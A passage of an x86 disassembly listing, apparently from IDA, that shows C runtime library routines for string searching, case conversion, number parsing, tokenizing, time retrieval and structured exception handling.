pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41747E: ; CODE XREF: sub_417440+25�j
; sub_417440+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_417470
lea edi, [esi-1]
loc_41748A: ; CODE XREF: sub_417440+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_4174B9
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_417458
mov al, [ecx+3]
test al, al
jz short loc_4174B9
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_41748A
jmp short loc_417458
; ---------------------------------------------------------------------------
loc_4174AD: ; CODE XREF: sub_417440+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_417E86
; ---------------------------------------------------------------------------
loc_4174B9: ; CODE XREF: sub_417440+4F�j
; sub_417440+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_4174C0: ; CODE XREF: sub_417440+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_417440 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4174C6 proc near ; CODE XREF: sub_403852+BF�p
; sub_403852+12C�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 18h
push offset stru_42BE30
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
call sub_4191CF
mov esi, [eax+64h]
mov [ebp+var_20], esi
cmp esi, off_4323FC
jz short loc_4174F4
call sub_419FFE
mov esi, eax
mov [ebp+var_20], esi
loc_4174F4: ; CODE XREF: sub_4174C6+22�j
mov eax, [esi+14h]
cmp eax, ebx
jnz short loc_417523
mov eax, [ebp+arg_0]
mov edx, eax
cmp [eax], bl
jz loc_4175D1
loc_417508: ; CODE XREF: sub_4174C6+56�j
mov cl, [edx]
cmp cl, 61h
jl short loc_417519
cmp cl, 7Ah
jg short loc_417519
sub cl, 20h
mov [edx], cl
loc_417519: ; CODE XREF: sub_4174C6+47�j
; sub_4174C6+4C�j
inc edx
cmp [edx], bl
jnz short loc_417508
jmp loc_4175D1
; ---------------------------------------------------------------------------
loc_417523: ; CODE XREF: sub_4174C6+33�j
push 1
push dword ptr [esi+4]
push ebx
push ebx
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push eax
call sub_41C1A9
add esp, 20h
mov [ebp+var_24], eax
cmp eax, ebx
jz loc_4175CE
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_41757B
; ---------------------------------------------------------------------------
loc_417564: ; DATA XREF: .text:stru_42BE30�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_417568: ; DATA XREF: .text:stru_42BE30�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
xor ebx, ebx
xor edi, edi
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_41757B: ; CODE XREF: sub_4174C6+9C�j
cmp edi, ebx
jnz short loc_417595
push [ebp+var_24]
call sub_416E1F
pop ecx
mov edi, eax
mov [ebp+var_1C], 1
cmp edi, ebx
jz short loc_4175C2
loc_417595: ; CODE XREF: sub_4174C6+B7�j
push 1
push dword ptr [esi+4]
push [ebp+var_24]
push edi
push 0FFFFFFFFh
push [ebp+arg_0]
push 200h
push dword ptr [esi+14h]
call sub_41C1A9
add esp, 20h
test eax, eax
jz short loc_4175C2
push edi
push [ebp+arg_0]
call sub_41BFE0
pop ecx
pop ecx
loc_4175C2: ; CODE XREF: sub_4174C6+CD�j
; sub_4174C6+EF�j
cmp [ebp+var_1C], ebx
jz short loc_4175CE
push edi
call sub_416D07
pop ecx
loc_4175CE: ; CODE XREF: sub_4174C6+7C�j
; sub_4174C6+FF�j
mov eax, [ebp+arg_0]
loc_4175D1: ; CODE XREF: sub_4174C6+3C�j
; sub_4174C6+58�j
lea esp, [ebp-34h]
call __SEH_epilog
retn
sub_4174C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4175DA proc near ; CODE XREF: sub_417799+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_4191CF
mov esi, [eax+64h]
cmp esi, off_4323FC
jz short loc_4175F8
call sub_419FFE
mov esi, eax
loc_4175F8: ; CODE XREF: sub_4175DA+15�j
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
mov bl, [ecx]
lea edi, [ecx+1]
loc_417604: ; CODE XREF: sub_4175DA+55�j
cmp dword ptr [esi+28h], 1
movzx eax, bl
jle short loc_41761E
push 8
push eax
push esi
call sub_419DFB
mov ecx, [ebp+arg_0]
add esp, 0Ch
jmp short loc_417628
; ---------------------------------------------------------------------------
loc_41761E: ; CODE XREF: sub_4175DA+31�j
mov edx, [esi+48h]
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_417628: ; CODE XREF: sub_4175DA+42�j
test eax, eax
jz short loc_417631
mov bl, [edi]
inc edi
jmp short loc_417604
; ---------------------------------------------------------------------------
loc_417631: ; CODE XREF: sub_4175DA+50�j
cmp bl, 2Dh
jnz short loc_41763C
or [ebp+arg_C], 2
jmp short loc_417641
; ---------------------------------------------------------------------------
loc_41763C: ; CODE XREF: sub_4175DA+5A�j
cmp bl, 2Bh
jnz short loc_417644
loc_417641: ; CODE XREF: sub_4175DA+60�j
mov bl, [edi]
inc edi
loc_417644: ; CODE XREF: sub_4175DA+65�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_417789
cmp eax, 1
jz loc_417789
cmp eax, 24h
jg loc_417789
test eax, eax
push 10h
pop ecx
jnz short loc_41768C
cmp bl, 30h
jz short loc_417676
mov [ebp+arg_8], 0Ah
jmp short loc_4176A4
; ---------------------------------------------------------------------------
loc_417676: ; CODE XREF: sub_4175DA+91�j
mov al, [edi]
cmp al, 78h
jz short loc_417689
cmp al, 58h
jz short loc_417689
mov [ebp+arg_8], 8
jmp short loc_4176A4
; ---------------------------------------------------------------------------
loc_417689: ; CODE XREF: sub_4175DA+A0�j
; sub_4175DA+A4�j
mov [ebp+arg_8], ecx
loc_41768C: ; CODE XREF: sub_4175DA+8C�j
cmp [ebp+arg_8], ecx
jnz short loc_4176A4
cmp bl, 30h
jnz short loc_4176A4
mov al, [edi]
cmp al, 78h
jz short loc_4176A0
cmp al, 58h
jnz short loc_4176A4
loc_4176A0: ; CODE XREF: sub_4175DA+C0�j
inc edi
mov bl, [edi]
inc edi
loc_4176A4: ; CODE XREF: sub_4175DA+9A�j
; sub_4175DA+AD�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
loc_4176AC: ; CODE XREF: sub_4175DA+134�j
mov esi, off_432A60
movzx ecx, bl
mov cx, [esi+ecx*2]
test cl, 4
jz short loc_4176C6
movsx ecx, bl
sub ecx, 30h
jmp short loc_4176E5
; ---------------------------------------------------------------------------
loc_4176C6: ; CODE XREF: sub_4175DA+E2�j
test cx, 103h
jz short loc_417710
cmp bl, 61h
jl short loc_4176DF
cmp bl, 7Ah
jg short loc_4176DF
movsx ecx, bl
sub ecx, 20h
jmp short loc_4176E2
; ---------------------------------------------------------------------------
loc_4176DF: ; CODE XREF: sub_4175DA+F6�j
; sub_4175DA+FB�j
movsx ecx, bl
loc_4176E2: ; CODE XREF: sub_4175DA+103�j
add ecx, 0FFFFFFC9h
loc_4176E5: ; CODE XREF: sub_4175DA+EA�j
cmp ecx, [ebp+arg_8]
jnb short loc_417710
or [ebp+arg_C], 8
cmp [ebp+var_4], eax
jb short loc_4176FF
jnz short loc_4176F9
cmp ecx, edx
jbe short loc_4176FF
loc_4176F9: ; CODE XREF: sub_4175DA+119�j
or [ebp+arg_C], 4
jmp short loc_41770B
; ---------------------------------------------------------------------------
loc_4176FF: ; CODE XREF: sub_4175DA+117�j
; sub_4175DA+11D�j
mov esi, [ebp+var_4]
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_4], esi
loc_41770B: ; CODE XREF: sub_4175DA+123�j
mov bl, [edi]
inc edi
jmp short loc_4176AC
; ---------------------------------------------------------------------------
loc_417710: ; CODE XREF: sub_4175DA+F1�j
; sub_4175DA+10E�j
mov eax, [ebp+arg_C]
dec edi
test al, 8
jnz short loc_417727
cmp [ebp+arg_4], 0
jz short loc_417721
mov edi, [ebp+arg_0]
loc_417721: ; CODE XREF: sub_4175DA+142�j
and [ebp+var_4], 0
jmp short loc_417772
; ---------------------------------------------------------------------------
loc_417727: ; CODE XREF: sub_4175DA+13C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_41774B
test al, 1
jnz short loc_417772
and eax, 2
jz short loc_417742
cmp [ebp+var_4], 80000000h
ja short loc_41774B
loc_417742: ; CODE XREF: sub_4175DA+15D�j
test eax, eax
jnz short loc_417772
cmp [ebp+var_4], esi
jbe short loc_417772
loc_41774B: ; CODE XREF: sub_4175DA+154�j
; sub_4175DA+166�j
call sub_41B9A5
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_417762
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_417772
; ---------------------------------------------------------------------------
loc_417762: ; CODE XREF: sub_4175DA+180�j
mov al, byte ptr [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_417772: ; CODE XREF: sub_4175DA+14B�j
; sub_4175DA+158�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41777B
mov [eax], edi
loc_41777B: ; CODE XREF: sub_4175DA+19D�j
test byte ptr [ebp+arg_C], 2
jz short loc_417784
neg [ebp+var_4]
loc_417784: ; CODE XREF: sub_4175DA+1A5�j
mov eax, [ebp+var_4]
jmp short loc_417794
; ---------------------------------------------------------------------------
loc_417789: ; CODE XREF: sub_4175DA+6F�j
; sub_4175DA+78�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_417792
mov [eax], ecx
loc_417792: ; CODE XREF: sub_4175DA+1B4�j
xor eax, eax
loc_417794: ; CODE XREF: sub_4175DA+1AD�j
pop edi
pop esi
pop ebx
leave
retn
sub_4175DA endp
; =============== S U B R O U T I N E =======================================
sub_417799 proc near ; CODE XREF: sub_4042A2+440�p
; sub_409848+2AF8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4175DA
add esp, 10h
retn
sub_417799 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4177B0 proc near ; CODE XREF: sub_4042A2+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call dword_422160 ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_4184F0
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_4177E7
mov [ecx], eax
locret_4177E7: ; CODE XREF: sub_4177B0+33�j
leave
retn
sub_4177B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4177E9 proc near ; CODE XREF: sub_404849+2A�p
; sub_4052D1+FD�p ...
var_24 = byte ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_432A68
xor eax, [ebp+4]
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov [ebp+var_4], eax
call sub_4191CF
push 8
pop ecx
mov [ebp+arg_4], eax
xor eax, eax
lea edi, [ebp+var_24]
push 7
rep stosd
pop edi
loc_417815: ; CODE XREF: sub_4177E9+45�j
mov dl, [esi]
movzx ecx, dl
mov eax, ecx
and ecx, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+var_24]
or [eax], bl
inc esi
test dl, dl
jnz short loc_417815
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_417844
mov eax, [ebp+arg_4]
mov edx, [eax+18h]
jmp short loc_417844
; ---------------------------------------------------------------------------
loc_41783F: ; CODE XREF: sub_4177E9+72�j
test al, al
jz short loc_41785D
inc edx
loc_417844: ; CODE XREF: sub_4177E9+4C�j
; sub_4177E9+54�j
mov al, [edx]
movzx esi, al
xor ebx, ebx
mov ecx, esi
and ecx, edi
inc ebx
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test bl, cl
jnz short loc_41783F
loc_41785D: ; CODE XREF: sub_4177E9+58�j
mov ebx, edx
jmp short loc_417879
; ---------------------------------------------------------------------------
loc_417861: ; CODE XREF: sub_4177E9+93�j
movzx esi, byte ptr [edx]
xor eax, eax
mov ecx, esi
and ecx, edi
inc eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_24]
test al, cl
jnz short loc_417880
inc edx
loc_417879: ; CODE XREF: sub_4177E9+76�j
cmp byte ptr [edx], 0
jnz short loc_417861
jmp short loc_417884
; ---------------------------------------------------------------------------
loc_417880: ; CODE XREF: sub_4177E9+8D�j
and byte ptr [edx], 0
inc edx
loc_417884: ; CODE XREF: sub_4177E9+95�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax+18h], edx
mov eax, ebx
sub eax, edx
neg eax
sbb eax, eax
xor ecx, [ebp+4]
pop edi
and eax, ebx
pop esi
pop ebx
call sub_41C596
leave
retn
sub_4177E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4178A4 proc near ; CODE XREF: sub_405E13+AF�p
; sub_409848+5734�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 14h
push offset stru_42BE40
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_1C], esi
push esi
call sub_41B102
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41C5A4
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push esi
call sub_418A1C
mov [ebp+var_24], eax
push esi
push [ebp+var_20]
call sub_41C62C
add esp, 18h
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4178F8
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_4178A4 endp
; =============== S U B R O U T I N E =======================================
sub_4178F8 proc near ; CODE XREF: sub_4178A4+46�p
; DATA XREF: .text:stru_42BE40�o
push dword ptr [ebp-1Ch]
call sub_41B154
pop ecx
retn
sub_4178F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417902 proc near ; CODE XREF: sub_4179CA+1A�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi+14h], 0
push edi
jz loc_4179B6
cmp dword ptr [esi+24h], 0
jz short loc_417928
cmp ebx, 7Fh
jbe loc_4179B6
loc_417928: ; CODE XREF: sub_417902+1B�j
xor edi, edi
inc edi
cmp ebx, 100h
jnb short loc_417952
cmp [esi+28h], edi
jle short loc_417945
push edi
push ebx
push esi
call sub_419DFB
add esp, 0Ch
jmp short loc_41794E
; ---------------------------------------------------------------------------
loc_417945: ; CODE XREF: sub_417902+34�j
mov eax, [esi+48h]
movzx eax, byte ptr [eax+ebx*2]
and eax, edi
loc_41794E: ; CODE XREF: sub_417902+41�j
test eax, eax
jz short loc_4179C3
loc_417952: ; CODE XREF: sub_417902+2F�j
mov edx, [esi+48h]
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_417973
and byte ptr [ebp+arg_0+2], 0
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
pop eax
jmp short loc_41797C
; ---------------------------------------------------------------------------
loc_417973: ; CODE XREF: sub_417902+60�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
mov eax, edi
loc_41797C: ; CODE XREF: sub_417902+6F�j
push edi
push dword ptr [esi+4]
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 100h
push dword ptr [esi+14h]
call sub_41C1A9
add esp, 20h
test eax, eax
jz short loc_4179C3
cmp eax, edi
jnz short loc_4179A9
movzx eax, [ebp+var_4]
jmp short loc_4179C5
; ---------------------------------------------------------------------------
loc_4179A9: ; CODE XREF: sub_417902+9F�j
movzx ecx, [ebp+var_3]
xor eax, eax
mov ah, [ebp+var_4]
or eax, ecx
jmp short loc_4179C5
; ---------------------------------------------------------------------------
loc_4179B6: ; CODE XREF: sub_417902+11�j
; sub_417902+20�j
cmp ebx, 41h
jl short loc_4179C3
cmp ebx, 5Ah
lea eax, [ebx+20h]
jle short loc_4179C5
loc_4179C3: ; CODE XREF: sub_417902+4E�j
; sub_417902+9B�j ...
mov eax, ebx
loc_4179C5: ; CODE XREF: sub_417902+A5�j
; sub_417902+B2�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_417902 endp
; =============== S U B R O U T I N E =======================================
sub_4179CA proc near ; CODE XREF: sub_40734B+6�p
; sub_407736+56�p ...
arg_0 = dword ptr 4
call sub_4191CF
mov eax, [eax+64h]
cmp eax, off_4323FC
jz short loc_4179DF
call sub_419FFE
loc_4179DF: ; CODE XREF: sub_4179CA+E�j
push [esp+arg_0]
push eax
call sub_417902
pop ecx
pop ecx
retn
sub_4179CA endp
; =============== S U B R O U T I N E =======================================
sub_4179EC proc near ; CODE XREF: sub_407B66+27�p
; sub_407BA7+4D�p
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_416DF3
pop ecx
pop ecx
retn
sub_4179EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4179FA proc near ; CODE XREF: sub_41CB16+60�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_4179FA endp
; ---------------------------------------------------------------------------
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_417A2A proc near ; CODE XREF: sub_41C791+25�p
; sub_41C99A+149�p ...
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_417A2A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A31 proc near ; CODE XREF: sub_417ADD+5A�p
; sub_41CB16:loc_41CB39�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, large fs:0
mov [ebp+var_4], esi
mov [ebp+var_8], offset loc_417A5A
push 0
push [ebp+arg_4]
push [ebp+var_8]
push [ebp+arg_0]
call sub_421936 ; RtlUnwind
loc_417A5A: ; DATA XREF: sub_417A31+12�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and eax, 0FFFFFFFDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edi, large fs:0
mov ebx, [ebp+var_4]
mov [ebx], edi
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_417A31 endp
; ---------------------------------------------------------------------------
loc_417A83: ; CODE XREF: .text:00421F32�j
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41CE1F
add esp, 20h
mov [ebp-4], eax
pop edi
pop esi
pop ebx
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_417AB9: ; DATA XREF: sub_417C5D+17�o
cld
mov eax, [esp+8]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push dword ptr [esp+20h]
push dword ptr [eax+0Ch]
push dword ptr [esp+20h]
call sub_41CE1F
add esp, 20h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417ADD proc near ; DATA XREF: sub_417CAE+B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_417AFE
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_417B4B
; ---------------------------------------------------------------------------
loc_417AFE: ; CODE XREF: sub_417ADD+10�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41CE1F
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_417B3C
push [ebp+arg_0]
push [ebp+arg_4]
call sub_417A31
loc_417B3C: ; CODE XREF: sub_417ADD+52�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_417B4B: ; CODE XREF: sub_417ADD+1F�j
pop ebx
pop ebp
retn
sub_417ADD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417B4E proc near ; CODE XREF: sub_41CB7D+52�p
; sub_41CC3D+E2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_417BA4
loc_417B6C: ; CODE XREF: sub_417B4E+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_417B76
call sub_41CEF6
loc_417B76: ; CODE XREF: sub_417B4E+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_417B8A
cmp ecx, [eax+8]
jle short loc_417B8F
loc_417B8A: ; CODE XREF: sub_417B4E+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_417B9B
loc_417B8F: ; CODE XREF: sub_417B4E+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_417B9B: ; CODE XREF: sub_417B4E+3F�j
cmp [ebp+arg_4], 0
jge short loc_417B6C
mov eax, [ebp+var_4]
loc_417BA4: ; CODE XREF: sub_417B4E+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_417BB8
cmp esi, eax
jbe short loc_417BBD
loc_417BB8: ; CODE XREF: sub_417B4E+64�j
call sub_41CEF6
loc_417BBD: ; CODE XREF: sub_417B4E+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_417B4E endp
; =============== S U B R O U T I N E =======================================
sub_417BC8 proc near ; CODE XREF: sub_41C7F3+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_4191CF
mov eax, [eax+84h]
mov [esi+4], eax
call sub_4191CF
mov [eax+84h], esi
mov eax, esi
pop esi
retn
sub_417BC8 endp
; =============== S U B R O U T I N E =======================================
sub_417BF0 proc near ; CODE XREF: sub_41C936+4B�p
arg_0 = dword ptr 4
call sub_4191CF
mov eax, [eax+84h]
jmp short loc_417C08
; ---------------------------------------------------------------------------
loc_417BFD: ; CODE XREF: sub_417BF0+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_417C0E
mov eax, [eax+4]
loc_417C08: ; CODE XREF: sub_417BF0+B�j
test eax, eax
jnz short loc_417BFD
inc eax
retn
; ---------------------------------------------------------------------------
loc_417C0E: ; CODE XREF: sub_417BF0+13�j
xor eax, eax
retn
sub_417BF0 endp
; =============== S U B R O U T I N E =======================================
sub_417C11 proc near ; CODE XREF: sub_41C936+9�p
arg_0 = dword ptr 4
push esi
call sub_4191CF
mov esi, [esp+4+arg_0]
cmp esi, [eax+84h]
jnz short loc_417C33
call sub_4191CF
mov ecx, [esi+4]
mov [eax+84h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_417C33: ; CODE XREF: sub_417C11+10�j
call sub_4191CF
mov eax, [eax+84h]
jmp short loc_417C49
; ---------------------------------------------------------------------------
loc_417C40: ; CODE XREF: sub_417C11+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_417C55
mov eax, ecx
loc_417C49: ; CODE XREF: sub_417C11+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_417C40
pop esi
jmp sub_41CEF6
; ---------------------------------------------------------------------------
loc_417C55: ; CODE XREF: sub_417C11+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_417C11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417C5D proc near ; CODE XREF: sub_41C7F3+71�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_10], offset loc_417AB9
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41CF30
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_417C5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417CAE proc near ; CODE XREF: sub_41CB7D+33�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_417ADD
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_417D31
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_4191CF
call dword ptr [eax+74h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_417D31: ; DATA XREF: sub_417CAE+3A�o
cmp [ebp+var_4], 0
jz short loc_417D4E
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_417D57
; ---------------------------------------------------------------------------
loc_417D4E: ; CODE XREF: sub_417CAE+87�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_417D57: ; CODE XREF: sub_417CAE+9E�j
mov eax, [ebp+var_34]
pop ebx
leave
retn
sub_417CAE endp
; ---------------------------------------------------------------------------
align 10h
